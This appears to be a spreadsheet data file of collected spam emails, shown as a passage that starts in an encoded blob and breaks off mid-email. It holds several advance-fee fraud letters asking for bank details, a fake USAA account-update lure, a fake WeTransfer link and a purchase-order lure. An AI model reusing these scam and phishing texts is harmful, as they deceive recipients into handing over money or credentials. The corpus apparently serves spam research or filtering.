5r/wA/0/Q/4ROEDEEcUjxSMvX6t/0IJcvI\n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\</t>
  </si>
  <si>
    <t>http://www.k1-web.com http://www.k1-web.com http://www.k1-web.com http://www.k1-web.com</t>
  </si>
  <si>
    <t>2566</t>
  </si>
  <si>
    <t>To: nan\nFrom: YSOUF AROUNA &lt;ysoufarouna000075@hotmail.fr&gt;\nDate: Tue, 03 Oct 2006 21:36:53 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Oct 2006 21:36:53 +0000</t>
  </si>
  <si>
    <t>YSOUF AROUNA &lt;ysoufarouna000075@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>ATTN: HELPER.\n\n(STRICTLY CONFIDENTIAL)\nFROM THE DESK OF ( MR. YSOUF AROUNA)\nAUDITING AND ACCOUNTING UNIT /FOREIGN REMITTANCE DEPT.\nAFRICAN DEVELOPMENT BANK (A.D.B)OUAGADOUGOU -BF\nREQUEST FOR THE URGENT TRANSFER OF THE SUM (US$10.5million) ONLY\nINTO YOUR ACCOUNT.\n\nYou may be surprise to receive this message from me since you don't\nknow me in person, but for the purpose of introduction., I got your\nimpressive information through an international business equiry .\n\nBut I respectfully insist you read crefully as I am optimistic it\nwill open doors for unimaginable financial reward for both us.\nThis business transaction might not fall within the wide spectrum of\nyour business activities ,but I plead your assistance ,as your flair\nfor profitable business is needed .\n\nPermit me to introduce myself. I am MR. YSOUF AROUNA. the Manager of\nauditing and accounting unit at the foreign remittance department of\nAFRICAN DEVELOPMENT BANK . In My department I discovered an\nabandoned sum of$ 10.5m US dollars . In an account that belongs to\none of our foreign customer who died along with his entire family in\nnovember 2002 in a plane crash.\n\nSince I got information about his death, I have been expecting his\nnext of kin to come over and claim his money because wecannot\nrelease it unless somebody applies for it as next of kin or relation\nto the deceased anindicated in our banking guidelines but\nunfortunately I learnt that all his supposed next of kin or relation\ndied alongside\nwith him at the planecrash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and other officials in my\ndepartment now decided to make businness proposal to you and release\nthe money to you as the next of kin or relation to the deceased for\nsafety and subsequent disbursement since nobody is coming for it and\nI don?t want this money to go into the Bank treasury as unclaimed\nBill.\n\nThe Banking law and guideline here stipulates that if such money\nremained unclamed after five years, the money will be transfered\ninto the Bank treasury as unclaimed fund.\n\nThe request of foreigner as next of kin in this business is\noccasioned bythe fact that the customer was a foreigner and a\nBurkinabe cannot stand as next of kin to a foreigner.\nI agree that 30 % of this money will be for you as foreign partner,\ninrespect to the provision of a foreign account, 10 %will be set\naside for expenses incured during the business and 60 % would be for\nme . There after I will visit your country with my family for\ndisbursement according to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as\narranged, you must apply first to the bank as relations or next of\nkin of the deceased indicating your bank name, your bank account\nnumber,\nyour private telephone and fax number for easy and effective\ncommunication and location where in the money will be remitted .\n\nOn your acceptance, I will send to the text of application by fax or\nby email which you are going to apply to the bank ; and provide\nmaterials confirmation references and inquiries regarding payment\nformalities from the payment Agency. I willbe handling official\nprotocols here and expect you to undertake international\nresponsibilities as I am assuring you of a risk free transaction\nprovided you display maturity.\n\nTherefore, if you are willing and interested to render\nthe needed assistance, endeavor to reply through my\nemail address .\n\nThanking you in anticipation of your kind considerations.\n\nYours sincerely.\n\nMR. YSOUF AROUNA.\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2565</t>
  </si>
  <si>
    <t>To: nan\nFrom: YSOUF AROUNA &lt;ysoufarouna000069@hotmail.fr&gt;\nDate: Tue, 03 Oct 2006 21:16:08 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Oct 2006 21:16:08 +0000</t>
  </si>
  <si>
    <t>YSOUF AROUNA &lt;ysoufarouna000069@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>ATTN: HELPER.\n\n(STRICTLY CONFIDENTIAL)\nFROM THE DESK OF ( MR. YSOUF AROUNA)\nAUDITING AND ACCOUNTING UNIT /FOREIGN REMITTANCE DEPT.\nAFRICAN DEVELOPMENT BANK (A.D.B)OUAGADOUGOU -BF\nREQUEST FOR THE URGENT TRANSFER OF THE SUM (US$10.5million) ONLY\nINTO YOUR ACCOUNT.\n\nYou may be surprise to receive this message from me since you don't\nknow me in person, but for the purpose of introduction., I got your\nimpressive information through an international business equiry .\n\nBut I respectfully insist you read crefully as I am optimistic it\nwill open doors for unimaginable financial reward for both us.\nThis business transaction might not fall within the wide spectrum of\nyour business activities ,but I plead your assistance ,as your flair\nfor profitable business is needed .\n\nPermit me to introduce myself. I am MR. YSOUF AROUNA. the Manager of\nauditing and accounting unit at the foreign remittance department of\nAFRICAN DEVELOPMENT BANK . In My department I discovered an\nabandoned sum of$ 10.5m US dollars . In an account that belongs to\none of our foreign customer who died along with his entire family in\nnovember 2002 in a plane crash.\n\nSince I got information about his death, I have been expecting his\nnext of kin to come over and claim his money because wecannot\nrelease it unless somebody applies for it as next of kin or relation\nto the deceased anindicated in our banking guidelines but\nunfortunately I learnt that all his supposed next of kin or relation\ndied alongside\nwith him at the planecrash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and other officials in my\ndepartment now decided to make businness proposal to you and release\nthe money to you as the next of kin or relation to the deceased for\nsafety and subsequent disbursement since nobody is coming for it and\nI don?t want this money to go into the Bank treasury as unclaimed\nBill.\n\nThe Banking law and guideline here stipulates that if such money\nremained unclamed after five years, the money will be transfered\ninto the Bank treasury as unclaimed fund.\n\nThe request of foreigner as next of kin in this business is\noccasioned bythe fact that the customer was a foreigner and a\nBurkinabe cannot stand as next of kin to a foreigner.\nI agree that 30 % of this money will be for you as foreign partner,\ninrespect to the provision of a foreign account, 10 %will be set\naside for expenses incured during the business and 60 % would be for\nme . There after I will visit your country with my family for\ndisbursement according to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as\narranged, you must apply first to the bank as relations or next of\nkin of the deceased indicating your bank name, your bank account\nnumber,\nyour private telephone and fax number for easy and effective\ncommunication and location where in the money will be remitted .\n\nOn your acceptance, I will send to the text of application by fax or\nby email which you are going to apply to the bank ; and provide\nmaterials confirmation references and inquiries regarding payment\nformalities from the payment Agency. I willbe handling official\nprotocols here and expect you to undertake international\nresponsibilities as I am assuring you of a risk free transaction\nprovided you display maturity.\n\nTherefore, if you are willing and interested to render\nthe needed assistance, endeavor to reply through my\nemail address .\n\nThanking you in anticipation of your kind considerations.\n\nYours sincerely.\n\nMR. YSOUF AROUNA.\n\n_________________________________________________________________\nTen : profite de ton Messenger en illimit sur ton mobile !  \n[URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2564</t>
  </si>
  <si>
    <t>To: nan\nFrom: mrs ajaha ahmed &lt;mrs.ajaha_a110@hotmail.com&gt;\nDate: Tue, 03 Oct 2006 10:00:30 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Oct 2006 10:00:30 +0000</t>
  </si>
  <si>
    <t>mrs ajaha ahmed &lt;mrs.ajaha_a110@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT ASSISTANT PLEASE.</t>
  </si>
  <si>
    <t>FROM THE DESK OF: MRS AJAHA AHMED\nAFRICAN DEVELOPMENT BANK (ADB)\nBILL AND EXCHANGE DEPARTMENT,\nOFFSHORE OFFICE,OUAGADOUGOU,\nBURKINA-FASO.\n\nDear Friend,\n\nI am the Bill and Exchange(assistant) Manager of the Africa development \nBank,\nIn my department I discovered an abandoned sum of USD$11.300.000 (ELEVEN \nMILLION THREE HUNDERS U.S.A DOLLARS). In an account that belongs to one of \nour foreign customer who died along with his wife and two children in July \n2000 in a plane crash. Since we got information about his death, we have \nbeen expecting his next of kin to come over and claim his money because we \ncannot release it unless somebody applies for it as next of kin or relation \nto the deceased, as indicated in our banking guidelines but unfortunately we \nlearnt that all his supposed next of kin or relation died alongside with him \nin the plane crash leaving nobody behind for the claim.\n\n                          You can also confirm this in the website as \nfollow:\n\n                      [URL]http://news.bbc.co.uk[/URL]\n\nIt is therefore upon this discovery that I in my department now decided to \nmake this business proposals to you and release the money to you as next of \nkin or relation to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the bank \ntreasury as unclaimed fund. The banking law and guidelines here stipulates \nthat if such money remains unclaimed after  five years, the money will be \ntransferred into the bank treasury as unclaimed fund.\nThe request of foreigner in this transaction is necessary because our late \ncustomer was a foreigner and a Burkinabe cannot stand as next of kin to a \nforeigner. We agree that 27% of this money will be for you as foreigner \npartner, in respect to the provision of a foreign account,3% will be set \naside for expenses incurred during the business and 70% would be for me and \nmy colleague, after which we shall  visit your country for disbursement \naccording to the percentages indicated. Therefore to enable the immediate \ntransfer of this fund to you as arranged, you must apply first to the bank, \nand send your account number, your private telephone and fax number for easy \nand effective communication and location where  the money will be remitted.\nUpon receipt of your reply, I will send to you by fax or e-mail the text of \nthe application which you shall retype and fax to our foreign remittance \nmaneger,for easy execution of the transaction.\nI will not fail to bring to your notice that this transaction is 100% \nhitch-free on both side. As all required arrangement have been made for the \ntransfer. You should contact me immediately as soon as you receive this \nletter.\n\nTrusting to receive your urgent reply through my alternative Email \n:mrs_ajaha66@yahoo.fr\nBest regards.\n\nMRS AJAHA AHMED\nBILL AND EXCHANGE (ASSIST.)MANAGER,\nAFRICAN DEVELOPMENT BANK ANNEXE,\nOUAGADOUGOU BURKINA-FASO.\n\n_________________________________________________________________\nTestez Windows Live Mail Beta ! [URL]http://www.ideas.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.ideas.live.com</t>
  </si>
  <si>
    <t>To: Recipients &lt;usaa-offers@banking2.org&gt;\nFrom: "USAA" &lt;usaa-offers@banking2.org&gt;\nDate: Tue, 03 Nov 2015 22:18:36 +1300</t>
  </si>
  <si>
    <t>Tue, 03 Nov 2015 22:18:36 +1300</t>
  </si>
  <si>
    <t>"USAA" &lt;usaa-offers@banking2.org&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;usaa-offers@banking2.org&gt;</t>
  </si>
  <si>
    <t>IMPORTANT NEW MESSAGE FROM USAA</t>
  </si>
  <si>
    <t>E-mail Address Update	    View Accounts | Privacy Promise | Contact Us	    	        	 	    	 	     	 	   	    USAA SECURITY ZONE   USAA   MEMBER   USAA # ending in: 9351	   	    	    	    	    	   	     	     	         Dear Member,      We're making some exciting changes that will make your online banking experience very secure, We therefore request you to update your account. It is now important for you to update your full profile for your account safety. We need you to update your account information immediately.   click here to update your account now   The security of your personal information is always a priority at USAA. We work hard to help ensure your account information stays secure.   To learn how USAA protects your information, visit our Security Center on usaa.com. We value your business and are committed to keeping your accounts and personal information safe and secure.   Thank you,  USAA   	  	         	  	  	     	  	  	  	     	      Please do not reply to this e-mail. To send a secure message to USAA, please contact us.    Privacy Promise  USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288   	     	     	  	     	    66659-0309     	      --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] E-mail Address Update View Accounts | Privacy Promise | Contact Us                   USAA SECURITY ZONE  USAA  MEMBER  USAA # ending in: 9351                   Dear Member, We're making some exciting changes that will make your online banking experience very secure, We therefore request you to update your account. It is now important for you to update your full profile for your account safety. We need you to update your account information immediately.  click here to update your account now The security of your personal information is always a priority at USAA. We work hard to help ensure your account information stays secure.  To learn how USAA protects your information, visit our Security Center on usaa.com. We value your business and are committed to keeping your accounts and personal information safe and secure.  Thank you, USAA        Please do not reply to this e-mail.  To send a secure message to USAA, please contact us. Privacy Promise USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288   66659-0309    				This email has been checked for viruses by Avast antivirus software. 				[URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>4550</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "manueloko1000@netscape.net" &lt;manueloko3000@netscape.net&gt;\nDate: Tue, 03 Dec 2002 15:20:18</t>
  </si>
  <si>
    <t>Tue, 03 Dec 2002 15:20:18</t>
  </si>
  <si>
    <t>"manueloko1000@netscape.net" &lt;manueloko3000@netscape.net&gt;</t>
  </si>
  <si>
    <t>[ILUG] MANUEL OKO</t>
  </si>
  <si>
    <t>ATTN:SIR/MADAN      \n\n                                                             STRICTLY CONFIDENTIAL.\n\nI am pleased to introduce myself  to you.My name is Mr. Manuel Oko a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.\n\nI  am writing this letter to request your assistance in order to redeem an investment with the South African mining Corporation.The said investment, now valued at  ($15.5 million dollars ) Fifteen  million,five hundred thousand dollars only was purchased by Lucio Harper and contracted out to the South  African Mining Corporation in 1977 now recognised as mines and natural resources department.This redeemable investment interest,has now matured since March last year.\n\nSince MARCH last year, several attempts have been made to contact Lucio Harper without success and there is no way to contact any of his close relatives in whose favour the investment cash value can be paid.                                                    \n                                   \nSince we have access to all Lucio Harper's information,we can claim this money with the help of my partners with the South African Mines and natural resources department.All we have to do is to file claim using you as Lucio Harper's relative.\n\nI will like to assure you that there is absolutely nothing to worry about,because it is perfectly safe with no risk involved.Please ensure to keep this matter strictly confidential.My partner will file a claim for this money on your behalf from the SouthAfrican mining Corporation.When the claim is approved,you as the beneficiary \nwill be paid (25%) of the total amouth.\n\nSince this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.\n\nI will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  manueloko1000@netscape.net .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications \nrelating to the transaction will be explained to you.\n\n\nTruly yours\n\nManuel Oko\n\n\n \n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4547</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: bcsocial1@yahoo.com\nDate: Tue, 03 Dec 2002 02:55:25 -0500</t>
  </si>
  <si>
    <t>Tue, 03 Dec 2002 02:55:25 -0500</t>
  </si>
  <si>
    <t>bcsocial1@yahoo.com</t>
  </si>
  <si>
    <t>[ILUG-Social] prirodu requiremus social sample</t>
  </si>
  <si>
    <t>social\n\n\n\nOn January 1st 2002, the European countries began\n\nusing the new Euro.  Never before have so\n\nmany countries with such powerful economies united\n\nto use a single currency.  Get your piece of history\n\nnow!  We would like to send you a FREE Euro\n\nand a FREE report on world currency.  Just visit\n\nour site to request your Euro and Euro report:\n\n\n\n[URL]http://www.justaclick-supersite.com[/URL]\n\n\n\nIn addition to our currency report, you can receive\n\nour FREE INVESTMENT PACKAGE:\n\n\n\n*  Learn how $10,000 in options will leverage $1,000,000 in\n\nEuro Currency. This means even a small movement in the market\n\nhas huge profit potential. csice\n\n\n\nIf you are over age 18 and have some risk capital, it's\n\nimportant that you find out how the Euro will\n\nchange the economic world and how you can profit!\n\n\n\n[URL]http://www.justaclick-supersite.com[/URL]\n\n\n\n\n\nPlease carefully evaluate your financial position before\n\ntrading.  Only risk capital should be used.\n\n\n\n8C43FD25CB6F949944EE12C379E50028\n\nUTBXCUHEPUFFBNKWQ\n\n\n\nFull opt-out instructions on the bottom of the site\n\n\n\n\n\n\n\n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.justaclick-supersite.com http://www.justaclick-supersite.com http://www.linux.ie</t>
  </si>
  <si>
    <t>1335</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: jose@monkey.org\nDate: Tue, 03 Aug 2021 05:23:28 +0200</t>
  </si>
  <si>
    <t>Tue, 03 Aug 2021 05:23:28 +0200</t>
  </si>
  <si>
    <t>info@aevumglobal.essent you some files 3 items, 3.6 MB in total ・ Expires on 8 August, 2021 Download   Download link [URL]https://wetranecure-lastime.eu-gb.cf.appdomain.cloud[/URL] 3 items Document 1.pdf 1 MB Document 2.pdf 1.1 MB Document 3.pdf 1.5 MB To make sure our emails arrive, please add noreply@wetransfer.com to your contacts. About WeTransfer     ・     Help     ・     Legal     ・     Report this transfer as spam</t>
  </si>
  <si>
    <t>https://wetranecure-lastime.eu-gb.cf.appdomain.cloud</t>
  </si>
  <si>
    <t>965</t>
  </si>
  <si>
    <t>To: mead-owner@krusty.si.UM\nFrom: mead-owner@krusty.si.UM\nDate: Tue, 02 Nov 2004 18:21:20 -0500</t>
  </si>
  <si>
    <t>Tue, 02 Nov 2004 18:21:20 -0500</t>
  </si>
  <si>
    <t>mead-owner@krusty.si.UM</t>
  </si>
  <si>
    <t>Mead post from semassaq@netscape.net requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Mead@lists.si.UM\n    From:    semassaq@netscape.net\n    Subject: HELP PLEASE.\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>2049</t>
  </si>
  <si>
    <t>To: nan\nFrom: MR WILLAMS TERRY &lt;willams22_terry@yahoo.com&gt;\nDate: Tue, 02 May 2006 14:08:54 +0200</t>
  </si>
  <si>
    <t>Tue, 02 May 2006 14:08:54 +0200</t>
  </si>
  <si>
    <t>MR WILLAMS TERRY &lt;willams22_terry@yahoo.com&gt;</t>
  </si>
  <si>
    <t>I NEED YOUR HELP</t>
  </si>
  <si>
    <t>Mr Willams Terry\nCommercial Bank Of senegal\n118 Rue Dial Yorff\nDakar Senegal\n West Africa\n \nDear Friend,\nI cant imagine how you will feel receiving a sudden business letter \nfrom a remote country in far away \nAfrica and probably from someone you are not closely related with. But \nall the same, I believe we do not \nneed to be of blood relatives before we can establish cordial/business \nrelationship. Having said this,I \nthink it is very important at this juncture to introduce myself to you.\nI am Mr.Wiilams Terry\n, Head: Enterprise Wide Risk and member of the \nexecutive and risk committees of \nCommecial Bant of Senegal.I got your information while browsing \nthrough internet in search of a \nreliable person who will assist me.This is an urgent and very \nconfidential business proposition. \nOn June 7, 2000,a Foreign Oil consultant/contractor with the  \nSenegal Institute of Mining and \nMetallurgy, Mr.Kurt Kahle made a numbered time(Fixed) Deposit for \ntwelve calendar months, valued at \nUS$10,500, 000.00,(Ten Million, five hundred thousand Dollars). \nUpon maturity,I sent a routine notification to his forwarding address \nbut got no reply. After a month, we \nsent a reminder and finally we discovered from his Private Business \nSchool. employers, that On the 31st \nof July 2000, our client, with his 37-year-old wife and his son \nMichael, aged eight died in the Air France \nconcord plane crash bound for New York in their plan for a world \ncruise, with other passengers abroad \nas you can confirm it yourself via the website below:\n[URL]http://news.bbc.co.uk[/URL] \nOn further investigation,I found out that he died without making a \n"WILL",and all attempts to trace his \nnext of kin was fruitless. I therefore made further investigation and \ndiscovered that Mr.Mr.Kurt Kahle did \nnot declare any next of kin or relations in all his official \ndocuments,including his Bank Deposit paperwork \nin my Bank. This sum of US$10,500,000.00 has carefully been fixed in my \nbank for safekeeping. No one \nwill ever come forward to claim it.According to Senegal Law, at \nthe expiration of 5 (five) years, the \nmoney will revert to the ownership of the Government if nobody applies \nto claim the fund. \nConsequently, my proposal is that I will like you as a foreigner to \nstand as the next of kin to Mr. Kurt Kahle \nso that the fruit of this old man's labor will not get into the hands \nof some corrupt Government officials.I \nam writing you because I as a public servant,i cannot operate a foreign \naccount. I want to present you \nas the owner of the funds so you will be able to claim them with the \nhelp of my attorney.I will like you to \nprovide immediately your full names and address so that the Attorney \nwill prepare the necessary \ndocuments which will put you in place as the beneficiary of the funds. \nThe money will be moved out for us to share in the ratio of 60% for me \nand 40% for you. The paperwork \nfor this transaction will be done by the Attorney If you are \ninterested, please reply immediately via my \nemail address and upon your response,I shall then provide you with more \ndetails that will help you \nunderstand the transaction.\nPlease observe utmost confidentiality, and be rest assured that this \ntransaction would be most profitable \nfor both of us because I shall require your assistance to invest my \nshare in real estate within your country. \nDue to the nature of confidentiality in this Transaction our \ncommunication can only be via email and fax \nmostly.\nAwaiting your urgent reply via email. willam77terry@yahoo.co.uk\nThanks and my regards.\nMr.Wiiilams Terry.\nPLEASE REPLY TO MY PRIVATE EMAIL:\nNOTE: If however, you are not disposed to assist, kindly delete/destroy \nthis email in view of the \nconfidentiality of the proposed transaction and interest of \npersonalities involves.\n\n\n\n\n</t>
  </si>
  <si>
    <t>1199</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: Soukghee Kim &lt;sandym@carrackltd.com&gt;\nDate: Tue, 02 Jun 2020 01:49:00 +0300</t>
  </si>
  <si>
    <t>Tue, 02 Jun 2020 01:49:00 +0300</t>
  </si>
  <si>
    <t>Soukghee Kim &lt;sandym@carrackltd.com&gt;</t>
  </si>
  <si>
    <t>Purchase order RFQ-HL51L05.</t>
  </si>
  <si>
    <t>Good day, Please find attached a new purchase order RFQ-HL51L05 for week Review the order and let us know the prices, delivery date, item Best regards, Soukghee Kim Company name  Carrack Ltd Address: Badentoy Crescent, Portlethen, Ab12 4yd, Aberdeen Country  :United Kingdom Email : carrack@carrackltd.com Telephone:+44 0 1224 783100 Fax: +44 0 1224 783400 Website : [URL]www.carrackltd.com[/URL] [1]    Links: ------ [1] [URL]http://www.carrackltd.com[/URL] Good day,  Please find attached a new purchase order RFQ-HL51L05 for week  Review the order and let us know the prices, delivery date, item  Best regards, Soukghee Kim  Company name  Carrack Ltd  Address: Badentoy Crescent, Portlethen, Ab12 4yd, Aberdeen Country  :United Kingdom Email : carrack@carrackltd.com Telephone:+44 0 1224 783100 Fax: +44 0 1224 783400 Website : [URL]www.carrackltd.com[/URL]</t>
  </si>
  <si>
    <t>www.carrackltd.com http://www.carrackltd.com www.carrackltd.com</t>
  </si>
  <si>
    <t>To: R@S\nFrom: J.C.G &lt;jocg102@netscape.net&gt;\nDate: Tue, 02 Dec 2003 16:09:53 +0100</t>
  </si>
  <si>
    <t>Tue, 02 Dec 2003 16:09:53 +0100</t>
  </si>
  <si>
    <t>J.C.G &lt;jocg102@netscape.net&gt;</t>
  </si>
  <si>
    <t>KINDLY TREAT</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Prospective Partner,\n \nAccept my compliments. However strange or surprising this contact might seem to you, I ask that you give due consideration to its importance, as we both stand to benefit immensely. Though we have not met or know each other, this is a criterion I have used to select you, as I wish to cut off all ties with my people for security and safety reasons.\n \nI am a stepson and personal aide to the Late General Robert Guei of blessed memory, former President of Cote d'Ivoire (Ivory Coast).\n \nYou may not be conversant with the present situation in my country, which has gradually degenerated into a civil war. On September 19, 2002, My Dad led a failed coup d'etat against President Laurent Gbagbo, in a bid to restore political stability in my country. Unfortunately, he was killed. After my Dad's death, there was confusion and power struggle in our camp; this led to an insurgence of several factions and has left no hope for peace anytime nearby.  To understand more on the situation click on this link 